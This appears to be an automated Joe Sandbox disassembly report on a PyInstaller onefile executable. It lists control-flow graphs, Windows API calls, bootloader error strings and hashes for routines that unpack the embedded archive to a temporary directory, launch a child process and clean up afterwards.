11 API calls 20640->20641 20642 7ff6b751b088 20641->20642 20643 7ff6b751a948 __free_lconv_num 11 API calls 20642->20643 20644 7ff6b751b095 20643->20644 20645 7ff6b751a948 __free_lconv_num 11 API calls 20644->20645 20646 7ff6b751b0a5 20645->20646 20647 7ff6b751a948 __free_lconv_num 11 API calls 20646->20647 20648 7ff6b751b0b5 20647->20648 20653 7ff6b751ae94 20648->20653 20667 7ff6b75202d8 EnterCriticalSection 20653->20667

Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 0 7ff6b75089e0-7ff6b7508b26 call 7ff6b750c850 call 7ff6b7509390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c call 7ff6b75153f0 call 7ff6b751a47c call 7ff6b751871c GetCommandLineW CreateProcessW 23 7ff6b7508b28-7ff6b7508b48 GetLastError call 7ff6b7502c50 0->23 24 7ff6b7508b4d-7ff6b7508b89 RegisterClassW 0->24 31 7ff6b7508e39-7ff6b7508e5f call 7ff6b750c550 23->31 26 7ff6b7508b8b GetLastError 24->26 27 7ff6b7508b91-7ff6b7508be5 CreateWindowExW 24->27 26->27 29 7ff6b7508be7-7ff6b7508bed GetLastError 27->29 30 7ff6b7508bef-7ff6b7508bf4 ShowWindow 27->30 32 7ff6b7508bfa-7ff6b7508c0a WaitForSingleObject 29->32 30->32 34 7ff6b7508c88-7ff6b7508c8f 32->34 35 7ff6b7508c0c 32->35 36 7ff6b7508c91-7ff6b7508ca1 WaitForSingleObject 34->36 37 7ff6b7508cd2-7ff6b7508cd9 34->37 39 7ff6b7508c10-7ff6b7508c13 35->39 40 7ff6b7508ca7-7ff6b7508cb7 TerminateProcess 36->40 41 7ff6b7508df8-7ff6b7508e02 36->41 42 7ff6b7508cdf-7ff6b7508cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff6b7508dc0-7ff6b7508dd9 GetMessageW 37->43 44 7ff6b7508c1b-7ff6b7508c22 39->44 45 7ff6b7508c15 GetLastError 39->45 48 7ff6b7508cb9 GetLastError 40->48 49 7ff6b7508cbf-7ff6b7508ccd WaitForSingleObject 40->49 46 7ff6b7508e11-7ff6b7508e35 GetExitCodeProcess CloseHandle * 2 41->46 47 7ff6b7508e04-7ff6b7508e0a DestroyWindow 41->47 50 7ff6b7508d00-7ff6b7508d38 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff6b7508ddb-7ff6b7508de9 TranslateMessage DispatchMessageW 43->52 53 7ff6b7508def-7ff6b7508df6 43->53 44->36 51 7ff6b7508c24-7ff6b7508c41 PeekMessageW 44->51 45->44 46->31 47->46 48->49 49->41 54 7ff6b7508d3a 50->54 55 7ff6b7508d73-7ff6b7508d7a 
50->55 56 7ff6b7508c76-7ff6b7508c86 WaitForSingleObject 51->56 57 7ff6b7508c43-7ff6b7508c74 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->41 53->43 58 7ff6b7508d40-7ff6b7508d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->43 59 7ff6b7508d7c-7ff6b7508da5 QueryPerformanceCounter 55->59 56->34 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff6b7508dab-7ff6b7508db2 59->60 60->41 61 7ff6b7508db4-7ff6b7508db8 60->61 61->43
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 0f916afd0678db3eecd8a898f3a7dbc4401063a93fe515aea3663798724dcb29
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 1AD15E33A0CB8686EB109F78E8546A93771FF94B58F400239DB9E96AB4DF3CE5458740

Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 62 7ff6b7501000-7ff6b7503806 call 7ff6b750fe18 call 7ff6b750fe20 call 7ff6b750c850 call 7ff6b75153f0 call 7ff6b7515484 call 7ff6b75036b0 76 7ff6b7503814-7ff6b7503836 call 7ff6b7501950 62->76 77 7ff6b7503808-7ff6b750380f 62->77 82 7ff6b750383c-7ff6b7503856 call 7ff6b7501c80 76->82 83 7ff6b750391b-7ff6b7503931 call 7ff6b75045c0 76->83 78 7ff6b7503c97-7ff6b7503cb2 call 7ff6b750c550 77->78 87 7ff6b750385b-7ff6b750389b call 7ff6b7508830 82->87 90 7ff6b7503933-7ff6b7503960 call 7ff6b7507f90 83->90 91 7ff6b750396a-7ff6b750397f call 7ff6b7502710 83->91 96 7ff6b75038c1-7ff6b75038cc call 7ff6b7514f30 87->96 97 7ff6b750389d-7ff6b75038a3 87->97 99 7ff6b7503984-7ff6b75039a6 call 7ff6b7501c80 90->99 100 7ff6b7503962-7ff6b7503965 call 7ff6b751004c 90->100 101 7ff6b7503c8f 91->101 109 7ff6b75038d2-7ff6b75038e1 call 7ff6b7508830 96->109 110 7ff6b75039fc-7ff6b7503a2a call 7ff6b7508940 call 7ff6b75089a0 * 3 96->110 102 7ff6b75038a5-7ff6b75038ad 97->102 103 7ff6b75038af-7ff6b75038bd call 7ff6b75089a0 97->103 115 7ff6b75039b0-7ff6b75039b9 99->115 100->91 101->78 102->103 103->96 119 7ff6b75039f4-7ff6b75039f7 call 7ff6b7514f30 109->119 120 7ff6b75038e7-7ff6b75038ed 109->120 138 7ff6b7503a2f-7ff6b7503a3e call 7ff6b7508830 110->138 115->115 118 7ff6b75039bb-7ff6b75039d8 call 7ff6b7501950 115->118 118->87 130 7ff6b75039de-7ff6b75039ef call 7ff6b7502710 118->130 119->110 124 7ff6b75038f0-7ff6b75038fc 120->124 127 7ff6b7503905-7ff6b7503908 124->127 128 7ff6b75038fe-7ff6b7503903 124->128 127->119 131 7ff6b750390e-7ff6b7503916 call 7ff6b7514f30 127->131 128->124 128->127 130->101 131->138 141 7ff6b7503b45-7ff6b7503b53 138->141 142 7ff6b7503a44-7ff6b7503a47 138->142 143 7ff6b7503b59-7ff6b7503b5d 141->143 144 7ff6b7503a67 141->144 142->141 145 
7ff6b7503a4d-7ff6b7503a50 142->145 146 7ff6b7503a6b-7ff6b7503a90 call 7ff6b7514f30 143->146 144->146 147 7ff6b7503b14-7ff6b7503b17 145->147 148 7ff6b7503a56-7ff6b7503a5a 145->148 157 7ff6b7503a92-7ff6b7503aa6 call 7ff6b7508940 146->157 158 7ff6b7503aab-7ff6b7503ac0 146->158 149 7ff6b7503b2f-7ff6b7503b40 call 7ff6b7502710 147->149 150 7ff6b7503b19-7ff6b7503b1d 147->150 148->147 152 7ff6b7503a60 148->152 159 7ff6b7503c7f-7ff6b7503c87 149->159 150->149 153 7ff6b7503b1f-7ff6b7503b2a 150->153 152->144 153->146 157->158 161 7ff6b7503be8-7ff6b7503bfa call 7ff6b7508830 158->161 162 7ff6b7503ac6-7ff6b7503aca 158->162 159->101 170 7ff6b7503c2e 161->170 171 7ff6b7503bfc-7ff6b7503c02 161->171 164 7ff6b7503ad0-7ff6b7503ae8 call 7ff6b7515250 162->164 165 7ff6b7503bcd-7ff6b7503be2 call 7ff6b7501940 162->165 175 7ff6b7503b62-7ff6b7503b7a call 7ff6b7515250 164->175 176 7ff6b7503aea-7ff6b7503b02 call 7ff6b7515250 164->176 165->161 165->162 177 7ff6b7503c31-7ff6b7503c40 call 7ff6b7514f30 170->177 173 7ff6b7503c04-7ff6b7503c1c 171->173 174 7ff6b7503c1e-7ff6b7503c2c 171->174 173->177 174->177 186 7ff6b7503b7c-7ff6b7503b80 175->186 187 7ff6b7503b87-7ff6b7503b9f call 7ff6b7515250 175->187 176->165 188 7ff6b7503b08-7ff6b7503b0f 176->188 184 7ff6b7503d41-7ff6b7503d63 call 7ff6b75044e0 177->184 185 7ff6b7503c46-7ff6b7503c4a 177->185 199 7ff6b7503d65-7ff6b7503d6f call 7ff6b7504630 184->199 200 7ff6b7503d71-7ff6b7503d82 call 7ff6b7501c80 184->200 189 7ff6b7503cd4-7ff6b7503ce6 call 7ff6b7508830 185->189 190 7ff6b7503c50-7ff6b7503c5f call 7ff6b75090e0 185->190 186->187 201 7ff6b7503ba1-7ff6b7503ba5 187->201 202 7ff6b7503bac-7ff6b7503bc4 call 7ff6b7515250 187->202 188->165 206 7ff6b7503d35-7ff6b7503d3c 189->206 207 7ff6b7503ce8-7ff6b7503ceb 189->207 204 7ff6b7503cb3-7ff6b7503cb6 call 7ff6b7508660 190->204 205 7ff6b7503c61 190->205 214 7ff6b7503d87-7ff6b7503d96 199->214 200->214 201->202 202->165 216 7ff6b7503bc6 202->216 221 7ff6b7503cbb-7ff6b7503cbd 204->221 211 7ff6b7503c68 call 7ff6b7502710 
205->211 206->211 207->206 212 7ff6b7503ced-7ff6b7503d10 call 7ff6b7501c80 207->212 224 7ff6b7503c6d-7ff6b7503c77 211->224 229 7ff6b7503d12-7ff6b7503d26 call 7ff6b7502710 call 7ff6b7514f30 212->229 230 7ff6b7503d2b-7ff6b7503d33 call 7ff6b7514f30 212->230 219 7ff6b7503dc4-7ff6b7503dda call 7ff6b7509390 214->219 220 7ff6b7503d98-7ff6b7503d9f 214->220 216->165 232 7ff6b7503ddc 219->232 233 7ff6b7503de8-7ff6b7503e04 SetDllDirectoryW 219->233 220->219 226 7ff6b7503da1-7ff6b7503da5 220->226 222 7ff6b7503cbf-7ff6b7503cc6 221->222 223 7ff6b7503cc8-7ff6b7503ccf 221->223 222->211 223->214 224->159 226->219 231 7ff6b7503da7-7ff6b7503dbe SetDllDirectoryW LoadLibraryExW 226->231 229->224 230->214 231->219 232->233 237 7ff6b7503f01-7ff6b7503f08 233->237 238 7ff6b7503e0a-7ff6b7503e19 call 7ff6b7508830 233->238 242 7ff6b7503f0e-7ff6b7503f15 237->242 243 7ff6b7504008-7ff6b7504010 237->243 251 7ff6b7503e32-7ff6b7503e3c call 7ff6b7514f30 238->251 252 7ff6b7503e1b-7ff6b7503e21 238->252 242->243 244 7ff6b7503f1b-7ff6b7503f25 call 7ff6b75033c0 242->244 245 7ff6b7504035-7ff6b7504067 call 7ff6b75036a0 call 7ff6b7503360 call 7ff6b7503670 call 7ff6b7506fc0 call 7ff6b7506d70 243->245 246 7ff6b7504012-7ff6b750402f PostMessageW GetMessageW 243->246 244->224 258 7ff6b7503f2b-7ff6b7503f3f call 7ff6b75090c0 244->258 246->245 263 7ff6b7503ef2-7ff6b7503efc call 7ff6b7508940 251->263 264 7ff6b7503e42-7ff6b7503e48 251->264 255 7ff6b7503e23-7ff6b7503e2b 252->255 256 7ff6b7503e2d-7ff6b7503e2f 252->256 255->256 256->251 269 7ff6b7503f64-7ff6b7503fa0 call 7ff6b7508940 call 7ff6b75089e0 call 7ff6b7506fc0 call 7ff6b7506d70 call 7ff6b75088e0 258->269 270 7ff6b7503f41-7ff6b7503f5e PostMessageW GetMessageW 258->270 263->237 264->263 268 7ff6b7503e4e-7ff6b7503e54 264->268 272 7ff6b7503e5f-7ff6b7503e61 268->272 273 7ff6b7503e56-7ff6b7503e58 268->273 306 7ff6b7503fa5-7ff6b7503fa7 269->306 270->269 272->237 275 7ff6b7503e67-7ff6b7503e83 call 7ff6b7506dc0 call 7ff6b7507340 272->275 274 7ff6b7503e5a 273->274 
273->275 274->237 289 7ff6b7503e85-7ff6b7503e8c 275->289 290 7ff6b7503e8e-7ff6b7503e95 275->290 292 7ff6b7503edb-7ff6b7503ef0 call 7ff6b7502a50 call 7ff6b7506fc0 call 7ff6b7506d70 289->292 293 7ff6b7503eaf-7ff6b7503eb9 call 7ff6b75071b0 290->293 294 7ff6b7503e97-7ff6b7503ea4 call 7ff6b7506e00 290->294 292->237 304 7ff6b7503ec4-7ff6b7503ed2 call 7ff6b75074f0 293->304 305 7ff6b7503ebb-7ff6b7503ec2 293->305 294->293 308 7ff6b7503ea6-7ff6b7503ead 294->308 304->237 318 7ff6b7503ed4 304->318 305->292 310 7ff6b7503ff5-7ff6b7504003 call 7ff6b7501900 306->310 311 7ff6b7503fa9-7ff6b7503fbf call 7ff6b7508ed0 call 7ff6b75088e0 306->311 308->292 310->224 311->310 323 7ff6b7503fc1-7ff6b7503fd6 311->323 318->292 324 7ff6b7503ff0 call 7ff6b7502a50 323->324 325 7ff6b7503fd8-7ff6b7503feb call 7ff6b7502710 call 7ff6b7501900 323->325 324->310 325->224
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                              • Opcode ID: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                              • Instruction ID: f3c13057bcb0795d7ae581c6e9239222db61db7870566825c6748627edfbdb5b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE327923A0CA8291FB299B2DD4553B927A1AF44788F84443ADB5DC32F6EF2CF559C344

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 538 7ff6b7526964-7ff6b75269d7 call 7ff6b7526698 541 7ff6b75269d9-7ff6b75269e2 call 7ff6b7514ee8 538->541 542 7ff6b75269f1-7ff6b75269fb call 7ff6b7518520 538->542 547 7ff6b75269e5-7ff6b75269ec call 7ff6b7514f08 541->547 548 7ff6b7526a16-7ff6b7526a7f CreateFileW 542->548 549 7ff6b75269fd-7ff6b7526a14 call 7ff6b7514ee8 call 7ff6b7514f08 542->549 565 7ff6b7526d32-7ff6b7526d52 547->565 550 7ff6b7526afc-7ff6b7526b07 GetFileType 548->550 551 7ff6b7526a81-7ff6b7526a87 548->551 549->547 557 7ff6b7526b09-7ff6b7526b44 GetLastError call 7ff6b7514e7c CloseHandle 550->557 558 7ff6b7526b5a-7ff6b7526b61 550->558 554 7ff6b7526ac9-7ff6b7526af7 GetLastError call 7ff6b7514e7c 551->554 555 7ff6b7526a89-7ff6b7526a8d 551->555 554->547 555->554 563 7ff6b7526a8f-7ff6b7526ac7 CreateFileW 555->563 557->547 573 7ff6b7526b4a-7ff6b7526b55 call 7ff6b7514f08 557->573 561 7ff6b7526b69-7ff6b7526b6c 558->561 562 7ff6b7526b63-7ff6b7526b67 558->562 568 7ff6b7526b72-7ff6b7526bc7 call 7ff6b7518438 561->568 569 7ff6b7526b6e 561->569 562->568 563->550 563->554 576 7ff6b7526be6-7ff6b7526c17 call 7ff6b7526418 568->576 577 7ff6b7526bc9-7ff6b7526bd5 call 7ff6b75268a0 568->577 569->568 573->547 583 7ff6b7526c19-7ff6b7526c1b 576->583 584 7ff6b7526c1d-7ff6b7526c5f 576->584 577->576 585 7ff6b7526bd7 577->585 586 7ff6b7526bd9-7ff6b7526be1 call 7ff6b751aac0 583->586 587 7ff6b7526c81-7ff6b7526c8c 584->587 588 7ff6b7526c61-7ff6b7526c65 584->588 585->586 586->565 590 7ff6b7526d30 587->590 591 7ff6b7526c92-7ff6b7526c96 587->591 588->587 589 7ff6b7526c67-7ff6b7526c7c 588->589 589->587 590->565 591->590 593 7ff6b7526c9c-7ff6b7526ce1 CloseHandle CreateFileW 591->593 595 7ff6b7526d16-7ff6b7526d2b 593->595 596 7ff6b7526ce3-7ff6b7526d11 GetLastError call 7ff6b7514e7c call 7ff6b7518660 593->596 595->590 596->595
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: cf893e351dc205a47d7644c89b0848d5f0e7030fc3451c5f0b844973060f5006
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 68C1AE37B28A4685EB10CFA9C4906AC3761FB49BA8F115239DF5E97BA4DF38E451C340

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B750842B
• RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084AE
• DeleteFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084CD
• FindNextFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084DB
• FindClose.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084EC
• RemoveDirectoryW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction ID: 357850099f2e1e2cd68665016846c1d9ce0cd1ccdab5cdcc1ad199b6742cb407
• Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction Fuzzy Hash: D1416023E0CA8695EA209F28E4445FA63A0FB9475CF500236EB9DD36E4EF3CE549C741
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: e73f47549c7a00f71c569e5c0274794dc2986bf4d1ef8f373acee72fd589298e
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: 0CF06823A1C74286F7608F68B4997667390AB84768F050339DBAD426E4DF3CD059CB04

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 331 7ff6b7501950-7ff6b750198b call 7ff6b75045c0 334 7ff6b7501991-7ff6b75019d1 call 7ff6b7507f90 331->334 335 7ff6b7501c4e-7ff6b7501c72 call 7ff6b750c550 331->335 340 7ff6b7501c3b-7ff6b7501c3e call 7ff6b751004c 334->340 341 7ff6b75019d7-7ff6b75019e7 call 7ff6b75106d4 334->341 345 7ff6b7501c43-7ff6b7501c4b 340->345 346 7ff6b75019e9-7ff6b7501a03 call 7ff6b7514f08 call 7ff6b7502910 341->346 347 7ff6b7501a08-7ff6b7501a24 call 7ff6b751039c 341->347 345->335 346->340 353 7ff6b7501a45-7ff6b7501a5a call 7ff6b7514f28 347->353 354 7ff6b7501a26-7ff6b7501a40 call 7ff6b7514f08 call 7ff6b7502910 347->354 361 7ff6b7501a5c-7ff6b7501a76 call 7ff6b7514f08 call 7ff6b7502910 353->361 362 7ff6b7501a7b-7ff6b7501afc call 7ff6b7501c80 * 2 call 7ff6b75106d4 353->362 354->340 361->340 373 7ff6b7501b01-7ff6b7501b14 call 7ff6b7514f44 362->373 376 7ff6b7501b35-7ff6b7501b4e call 7ff6b751039c 373->376 377 7ff6b7501b16-7ff6b7501b30 call 7ff6b7514f08 call 7ff6b7502910 373->377 382 7ff6b7501b50-7ff6b7501b6a call 7ff6b7514f08 call 7ff6b7502910 376->382 383 7ff6b7501b6f-7ff6b7501b8b call 7ff6b7510110 376->383 377->340 382->340 391 7ff6b7501b9e-7ff6b7501bac 383->391 392 7ff6b7501b8d-7ff6b7501b99 call 7ff6b7502710 383->392 391->340 393 7ff6b7501bb2-7ff6b7501bb9 391->393 392->340 396 7ff6b7501bc1-7ff6b7501bc7 393->396 398 7ff6b7501be0-7ff6b7501bef 396->398 399 7ff6b7501bc9-7ff6b7501bd6 396->399 398->398 400 7ff6b7501bf1-7ff6b7501bfa 398->400 399->400 401 7ff6b7501c0f 400->401 402 7ff6b7501bfc-7ff6b7501bff 400->402 404 7ff6b7501c11-7ff6b7501c24 401->404 402->401 403 7ff6b7501c01-7ff6b7501c04 402->403 403->401 405 7ff6b7501c06-7ff6b7501c09 403->405 406 7ff6b7501c2d-7ff6b7501c39 404->406 407 7ff6b7501c26 404->407 405->401 408 7ff6b7501c0b-7ff6b7501c0d 405->408 406->340 406->396 407->406 408->404
APIs
  • Part of subcall function 00007FF6B7507F90: _fread_nolock.LIBCMT ref: 00007FF6B750803A
• _fread_nolock.LIBCMT ref: 00007FF6B7501A1B
  • Part of subcall function 00007FF6B7502910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: e8397b0d0ea8626c6fc67993dd962eb2185773315f76238df3ab4be19089fc6a
                                                                                                                                                                                                                                              • Instruction ID: 5c34680bb581b6037308d45a95421ba431b8b308b1ce436240f7b5630e3438f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8397b0d0ea8626c6fc67993dd962eb2185773315f76238df3ab4be19089fc6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC816F73A0C68686EB61DB2CD0412BD23A1FF88788F444535EB8DC7BA5EE3CE5858741

Control-flow Graph
Function 7ff6b7501600-7ff6b750183b (rendered graph not reproduced; basic-block edge list omitted). Subcalls: 7ff6b7501050, 7ff6b75045c0, 7ff6b7502710, 7ff6b7514f08, 7ff6b7502910, 7ff6b75106d4, 7ff6b751004c, 7ff6b7501210, 7ff6b7514f44, 7ff6b7514f30, 7ff6b751039c, 7ff6b7510adc.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 7efa5df9256787d249526d0bd59650b0437ae4a7c3dc28480c0bb41e2e769eb3
• Instruction ID: 1c666878ca6cd65b34c36de1c7d6d3058427205002bf00e49484db3ad9b5a93f
• Opcode Fuzzy Hash: 7efa5df9256787d249526d0bd59650b0437ae4a7c3dc28480c0bb41e2e769eb3
• Instruction Fuzzy Hash: FD519D63B0C64782EA10AB6994001B963A0BF84798F844535EF4CC7BF6EE3CF685C301

Control-flow Graph
(rendered graph not reproduced)
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B7508704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750870A
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750874C
  • Part of subcall function 00007FF6B7508830: GetEnvironmentVariableW.KERNEL32(00007FF6B750388E), ref: 00007FF6B7508867
